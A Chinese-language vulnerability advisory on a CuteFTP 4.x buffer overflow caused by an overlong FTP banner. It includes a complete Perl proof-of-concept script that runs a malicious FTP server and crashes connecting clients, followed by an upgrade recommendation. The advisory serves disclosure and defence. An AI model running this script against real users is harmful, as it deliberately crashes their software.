涉及程序: CuteFTP v.4.* 描述: CuteFTP 超长字节 ftp-banner 缓冲溢出缺陷 详细: CuteFTP是一款使用得非常广泛的图形接口FTP客户端服务程序,使用在 Win9x/Me/NT/2000 平台上。 由于设计上的原因,CuteFTP 对传递的参数缺乏正确的边界检查,当接收到一个超过2048比特的 ftp-banner 时,由于无法进行正确地处理将会使程序彻底崩溃。 攻击者利用此缺陷通常是通过入侵或构建恶意的FTP服务器,并引诱用户连接。 受影响程序: CuteFTP v.4.* 攻击方法: #!/usr/bin/perl ###################################################### #Here is an example of ftp-server. It will freeze each #CuteFTP-user, that try to connect to it. ####################################################### use IO::Socket; $port = \"21\"; $data = \"a\"; $num = \"2049\"; $buf .= $data x $num; $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die \"Couldn\`t create tcp-server.\\n\"; while ($client = $server->accept()) { print \"Client connected.\\n\"; print \"Attacking...\"; print $client \"$buf\"; print \"OK\\n\"; close($client); } #EOF 解决方案: 下载最新版本的 CuteFTP : http://www.globalscape.com